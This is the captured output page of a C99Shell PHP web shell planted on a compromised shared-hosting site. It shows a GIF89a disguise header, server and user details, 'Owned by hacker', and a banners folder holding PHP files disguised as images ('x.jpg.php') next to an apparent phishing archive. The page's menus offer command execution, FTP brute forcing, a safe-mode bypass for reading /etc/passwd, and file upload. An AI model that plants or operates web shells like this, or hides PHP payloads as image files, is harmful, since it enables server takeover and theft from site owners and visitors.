GIF89a; cpaaffiliatenetworks.com - phpshell

!C99Shell v. 1.0 pre-release build #16!

Software: Apache. PHP/4.4.9 

uname -a: Linux p3slh106.shr.phx3.secureserver.net 2.4.21-63.ELsmp #1 SMP Tue Nov 3 18:23:59 EST
2009 i686 

uid=2095(morf01) gid=450(inetuser) groups=450(inetuser) 

Safe-mode: OFF (not secure)

/home/content/m/o/r/morf01/html/banners/   drwxr-xr-x
Free 2950.58 GB of 6400 GB (46.1%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Owned by hacker

Listing folder (5 files and 1 folders):

NameAsc. Size Modify Owner/Group Perms Action
 . LINK 11.06.2009 22:21:23 2095/450 drwxr-xr-x Info 
 .. LINK 11.07.2009 13:07:55 2095/450 drwx---r-x Info 
 [online-securise] DIR 12.06.2009 05:45:08 2095/450 drwxr-xr-x Info 
 1084207200_advertise_banner.gif 2.76 KB 15.11.2007 23:21:55 2095/450 -rw----r-- Info Change Download 
 1084207208_advertise_button.gif 1.39 KB 15.11.2007 23:22:03 2095/450 -rw----r-- Info Change Download 
 1242823896_x.jpg.php 61.6 KB 20.05.2009 05:51:36 2095/450 -rw-r--r-- Info Change Download 
 1243294050_x.jpg.php 61.6 KB 25.05.2009 16:27:30 2095/450 -rw-r--r-- Info Change Download 
 online-securise.zip 378.55 KB 11.06.2009 22:20:54 2095/450 -rw-r--r-- Info Change Download 

    


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | Generation time: 0.0427 ]--

coded & antivirus undetected by hamed bazargani (HBA)